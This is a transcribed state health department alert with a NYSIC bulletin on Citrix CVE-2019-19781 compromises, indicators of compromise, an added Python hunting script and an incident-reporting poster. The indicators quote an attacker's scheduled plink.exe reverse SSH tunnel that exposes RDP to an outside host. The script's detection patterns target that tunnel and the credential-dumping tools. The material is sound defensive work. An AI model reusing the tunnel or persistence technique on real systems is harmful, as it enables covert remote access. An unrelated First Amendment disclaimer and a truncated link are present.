
Transcription
New York State Department of Health (NYSDOH)
ALERT
April 3, 2020
Cyber Security Vulnerability

The New York State Intelligence Center Cyber Analysis Unit (NYSIC-CAU) has alerted and briefed the NYSDOH regarding the active threat of a cyber-attack that exploits a vulnerability in Citrix gateway management devices such as NetScaler, a widely used product.

This is a substantial threat. If this vulnerability is exploited, remote attackers can execute commands on a targeted device that allow them to gain a foothold inside the targeted networks and establish persistent access, even after the vulnerability has been patched. Further malicious activity, such as spreading ransomware that can seriously impact downstream facility operations, has been observed in multi-stage types of attack. These attacks have been seen in both public and private entities in NYS, including hospitals/healthcare facilities. A successful attack at this time of pandemic response could greatly debilitate those critical activities.

The NYSIC-CAU has issued a Cyber Intelligence Bulletin (see attached) to assist Chief Information Security Officers (CISOs) at organizations to successfully patch and scan their networks for evidence of compromise.

Please immediately share this bulletin with your hospital's CISO and information systems staff. If your information technology (IT) department suspects a compromise, please contact your local law enforcement and also contact your NYSDOH regional office, per the attached NYSDOH poster, to report the compromise.

The NYS Cyber Command Center, in conjunction with NYSIC and the Department of Homeland Security and Emergency Services (DHSES), will be recording a technical webinar that will walk through the details of this attack and offer suggested actions for remediation. Please share the attached bulletin with your IT staff and/or IT vendors. The link to the recording will be made available to providers on Tuesday, April 7, 2020.

Should you have more immediate questions after reviewing the attached Cyber Bulletin, please send email to the following address at the Cyber Incident Response Team (CIRT), NYS DHSES: [email protected]
UNCLASSIFIED//FOR OFFICIAL USE ONLY/REL TO USA, FVEY

February 28, 2020
NYSIC-CYB-20-02

ATTN: Information Technology Personnel (All Sectors)
SUBJECT: Active Citrix Vulnerability Compromises at Government Agencies in U.S.

OVERVIEW: In December 2019, a vulnerability was identified (CVE-2019-19781) that affects Citrix Application Delivery Controllers, Citrix Gateways (NetScaler Gateways), and Citrix SD-WAN WANOP appliances. If exploited, CVE-2019-19781 allows unauthenticated actors to perform arbitrary code execution. Citrix began releasing patches for the vulnerability on January 19th. The New York State Intelligence Center Cyber Analysis Unit (NYSIC CAU) became aware of the potential risk to NYS, as Citrix technologies are commonly used by state, county, and local entities. The NYSIC CAU sent a Situational Report (SITREP) on January 29, 2020 detailing the release of a free scanning tool provided by Citrix and FireEye Mandiant, "Indicator of Compromise Scanner," to aid customers in the detection of a compromise in connection with CVE-2019-19781. The NYSIC CAU recommended that all agencies utilizing the vulnerable technology implement the available patch and then use the scanning tool to check their networks for evidence of a compromise. Since that release, the NYSIC CAU has become aware of multiple compromises directly related to CVE-2019-19781 impacting government agencies. These incidents are ongoing and the full extent of the impact is not yet known.

Multiple indicators were collected from the first agency incident and have been shared below in support of network defense. Forensic analysts found that the actor was leveraging scheduled tasks as a persistence mechanism to launch tunnels using plink.exe and ngrok. The actor also obfuscated their activity by renaming malicious files as trusted files: ngrok was renamed svchost.exe and scheduled to run every 12-24 hours to establish a tunnel.

Initial forensics of a second agency incident has revealed an IP address known to be associated with the NOTROBIN malware. No artifacts or further activity associated with NOTROBIN has been discovered at this time. Threat researchers released an open-source report on January 16 detailing a separate incident against an unnamed victim in which the malicious actor(s) installed a backdoor with the NOTROBIN malware and then implemented the patch for CVE-2019-19781 to maintain exclusive access to the network. The NOTROBIN malware is new and had not been seen by threat researchers prior to that incident.

INDICATORS OF COMPROMISE:

Type            Indicator
IP Address      13[.]82[.]216[.]70
IP Address      40[.]117[.]127[.]90
IP Address      95[.]179[.]163[.]186
File            Mimikatz.py
File            Secretsdump.py
File            Svchost.exe (seen anywhere other than C:\windows\system32)
File            Admin.php (/var/themes/admin.php)
File            Chisel (/var/nstmp/chisel)
File            Tiny.php
Scheduled Task  <Actions Context="Author"><Exec><Command>C:\Windows\IME\en-US\plink.exe</Command><Arguments>ssh -R 2326:127.0.0.1:3389 [email protected] 0b:0e -pwArbab@123! -batch</Arguments></Exec></Actions>

The indicators are also attached in an Excel file for accessibility purposes.

RECOMMENDATIONS: The NYSIC CAU offers the following recommendations to mitigate threats associated with CVE-2019-19781. This is not a comprehensive list of mitigation strategies.

- Immediately implement all patches for CVE-2019-19781-vulnerable technologies used in your organization. For more information on available patches, visit the official Citrix article available at: https://support.citrix[.]com/article/CTX267027.
- Use the "Indicator of Compromise Scanner" tool to detect a compromise in connection with CVE-2019-19781. The tool has been made available on GitHub by Citrix and FireEye Mandiant. The tool and instructions can be found at: 781/. If scans return positive artifact identification, please contact 844-OCT-CIRT for reporting purposes and/or to request assistance.
- Change default passwords on all accounts.
- Maintain heightened log monitoring and awareness for suspicious activity on networks, especially those related to critical infrastructure.
- Evaluate third-party access to your networks and, if relevant, consider having a conversation with your Managed Service Providers (MSPs) to ensure appropriate steps are being taken to mitigate risk.
- Evaluate and manage third-party risks from the supply chain and vendors.
- Keep all systems up to date and apply appropriate patches when necessary.
- Ensure backups of systems are current and stored offline.
- Implement and maintain hardened configurations of systems.
- Remind employees to engage in cyber hygiene best practices, especially when utilizing email and internet-connected services.

HISTORY: The following intelligence products related to CVE-2019-19781 were previously sent out by the NYSIC CAU in an effort to inform partners and customers. These products have been attached for your convenience.

- NYSIC CAU Situational Report: (TLP: GREEN) Citrix Scanning Tool for CVE-2019-19781
- DHS CYMC IE - (U//FOUO/REL USA, FVEY) At Least Some Cyber Actors Who Exploited Vulnerable Citrix Devices in USG Networks Likely Established Backdoor Access
- DHS CYMC IE - (U//FOUO/REL USA, FVEY) Advanced Persistent Threat Cyber Actors Likely Use Citrix Vulnerability to Compromise Numerous US Networks

OUTLOOK: At this time the NYSIC CAU is aware of CVE-2019-19781 being used to directly impact entities within the United States. The NYSIC CAU reminds all recipients to report suspicious activity of a cyber threat nature to 844-OCT-CIRT, and suspicious activity of a physical threat nature to 866-SAFE-NYS, while utilizing 911 for emergencies.

For further information regarding the content of this bulletin, please contact the NYSIC-CAU at (518) 786-2191 or [email protected].

Please note that some of this information describes First Amendment protected activities. The NYSIC recognizes that Americans have constitutionally protected rights to assemble, speak, and petition the government. The NYSIC safeguards these rights and only reports on First Amendment protected activities; although no violence or criminality has been observed, this information is provided for operational planning in the interest of assuring the safety and security of the demonstrators and the public.
Requirements: NY-SIN- 1.1, 1.3, 1.5, 1.8 & 1.10
UNCLASSIFIED//FOR OFFICIAL USE ONLY/REL TO USA, FVEY
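The bulletin's indicators (a scheduled task launching plink.exe with a reverse SSH tunnel, ngrok renamed svchost.exe, the appliance file paths and the three IP addresses) are exactly the artifacts a responder hunts for after patching. The script below is an added example written for this page, not a NYSIC, Citrix or FireEye tool: it parses exported Windows scheduled-task XML for those traits and matches raw log lines against the published IPs and paths. The task XML, log lines, host, user name and password in it are constructed placeholders, not data from any incident.

```python
"""Hunt for the CVE-2019-19781 post-exploitation indicators listed in the bulletin above.

Added example for this page; it is not a NYSIC, Citrix or FireEye tool. It checks two
artifacts a responder would collect after patching an exposed appliance:
  1. Windows scheduled-task XML (what `schtasks /query /tn <name> /xml` prints), for the
     plink.exe reverse-SSH pattern and for a binary named svchost.exe that lives outside
     C:\\Windows\\System32 (the bulletin saw ngrok renamed that way).
  2. Plain-text logs (firewall, proxy, appliance shell history), for the bulletin's three
     IP addresses and on-appliance file paths.
The sample task XML and log lines below are constructed for the demonstration; the host,
user and password strings in them are placeholders, not values from any incident.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 13[.]82[.]216[.]70 back into a matchable string."""
    return indicator.replace("[.]", ".")


# Indicators exactly as published in the bulletin.
IOC_IPS = {refang(ip) for ip in ("13[.]82[.]216[.]70", "40[.]117[.]127[.]90", "95[.]179[.]163[.]186")}
IOC_PATHS = {"/var/themes/admin.php", "/var/nstmp/chisel", "mimikatz.py", "secretsdump.py", "tiny.php"}

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}  # Task Scheduler schema
TUNNEL_TOOLS = {"plink.exe", "ngrok.exe", "chisel.exe"}
SYSTEM32 = PureWindowsPath(r"C:\Windows\System32")
# "-R <port>:127.0.0.1:3389" publishes the victim's RDP service on the remote SSH server.
REVERSE_RDP = re.compile(r"-R\s+\d+:(?:127\.0\.0\.1|localhost):3389\b", re.I)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def scheduled_task_findings(task_xml: str) -> list[str]:
    """Return one finding per suspicious trait of an exported scheduled-task definition."""
    root = ET.fromstring(task_xml)
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=TASK_NS)
    findings: list[str] = []
    for exe in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        cmd = exe.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        args = exe.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        # Expand the variable most task definitions use so the System32 comparison holds.
        path = PureWindowsPath(re.sub(r"%systemroot%", lambda _: r"C:\Windows", cmd, flags=re.I))
        name = path.name.lower()
        if name in TUNNEL_TOOLS:
            findings.append(f"tunnel tool scheduled (repeat {interval or 'n/a'}): {cmd}")
        # PureWindowsPath compares case-insensitively, matching the bulletin's "anywhere else".
        if name == "svchost.exe" and path.parent != SYSTEM32:
            findings.append(f"svchost.exe outside System32 (masquerade): {cmd}")
        if REVERSE_RDP.search(args):
            findings.append(f"reverse SSH tunnel exposing RDP: {args}")
        if re.search(r"(?:^|\s)-pw\s*\S", args):
            findings.append("plaintext password passed on the command line")
    return findings


def log_findings(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line number, sorted matched indicators) for each log line hitting an IOC."""
    hits: list[tuple[int, list[str]]] = []
    for number, line in enumerate(lines, start=1):
        matched = set(IPV4.findall(line)) & IOC_IPS
        lowered = line.lower()
        matched |= {p for p in IOC_PATHS if p in lowered}
        if matched:
            hits.append((number, sorted(matched)))
    return hits


# Constructed sample: the bulletin's plink.exe task plus a masquerading svchost.exe action.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT12H</Interval></Repetition>
      <StartBoundary>2020-02-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\IME\en-US\plink.exe</Command>
      <Arguments>ssh -R 2326:127.0.0.1:3389 user@203.0.113.10 -pw PLACEHOLDER -batch</Arguments>
    </Exec>
    <Exec>
      <Command>C:\ProgramData\svchost.exe</Command>
      <Arguments>tcp 3389</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed sample log lines; only lines 1, 2 and 4 touch a published indicator.
SAMPLE_LOG_LINES = [
    "2020-02-10T03:12:44Z fw01 ACCEPT src=10.20.30.7 dst=13.82.216.70 dport=443",
    "2020-02-10T03:13:02Z ns01 sh[nobody]: chmod +x /var/nstmp/chisel",
    "2020-02-10T03:14:10Z fw01 ACCEPT src=10.20.30.7 dst=198.51.100.5 dport=443",
    "2020-02-10T03:16:01Z ns01 sh[nobody]: vi /var/themes/admin.php",
]

if __name__ == "__main__":
    for finding in scheduled_task_findings(SAMPLE_TASK_XML):
        print("TASK:", finding)
    for number, matched in log_findings(SAMPLE_LOG_LINES):
        print(f"LOG : line {number} -> {', '.join(matched)}")
```

Run it stand-alone to see the findings on the embedded samples; to use it on real data, feed `scheduled_task_findings` the output of `schtasks /query /tn <task> /xml` for each task on a host, and `log_findings` the firewall or appliance shell logs. Matching on a file name alone (tiny.php, secretsdump.py) is deliberately loose and will need triage; the svchost.exe check is the one that rarely false-positives, because a legitimate svchost.exe has no business outside System32. This complements, rather than replaces, the Citrix/FireEye scanner the bulletin recommends, which inspects the appliance itself.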
You're the Key to Reporting a Cybersecurity Incident!

An incident is considered a reportable "cybersecurity incident" under the New York State Department of Health guideline if it affects patient care or represents a serious threat to patient safety, including intrusions whose intent appears to be breach or theft of protected health records. Examples include, but are not limited to:

a. Successful intrusions into a health care provider's information technology system (including those that are contracted out by the health care provider), network infrastructure, and/or medical equipment/devices.
b. Ransomware attacks that disable all or part of information technology operations, including administrative systems such as payroll, billing, or appointment scheduling.
c. Cybersecurity incidents that have the potential to spread through established connections to other health care networks or government systems. Examples include file transfer systems or data reporting interfaces.

Business Hours: 8:30 am to 4:45 pm weekdays and non-holidays, unless noted.

Capital District, (518) 402-1036: Albany, Clinton, Columbia, Delaware, Essex, Franklin, Fulton, Greene, Hamilton, Montgomery, Otsego, Rensselaer, Saratoga, Schenectady, Schoharie, Warren and Washington

Central New York, (315) 477-8400: Broome, Cayuga, Chenango, Cortland, Herkimer, Jefferson, Lewis, Madison, Oneida, Onondaga, Oswego, St. Lawrence, Tioga and Tompkins

Metropolitan Area, (212) 417-5550, 9:00 am to 5:00 pm: Bronx, Kings, New York, Queens and Richmond

Central Islip, (631) 851-8050, 9:00 am to 5:00 pm: Nassau and Suffolk

New Rochelle, (914) 654-7005, 9:00 am to 5:00 pm: Dutchess, Orange, Putnam, Rockland, Sullivan, Ulster and Westchester

Western Area, (716) 847-4505: Allegany, Cattaraugus, Chautauqua, Chemung, Erie, Genesee, Livingston, Monroe, Niagara, Orleans, Ontario, Schuyler, Seneca, Steuben, Wayne, Wyoming and Yates

After Hours Emergencies: 4:45 pm to 8:30 am weekdays. Available 24 hours a day on weekends and holidays.
NYSDOH Duty Officer: (866) 881-2809. Select option #1 for reporting an emergency.

CALL 911 if there is an immediate threat to public health or safety.

In all cases, the cybersecurity incident should be reported to law enforcement.

Department of Health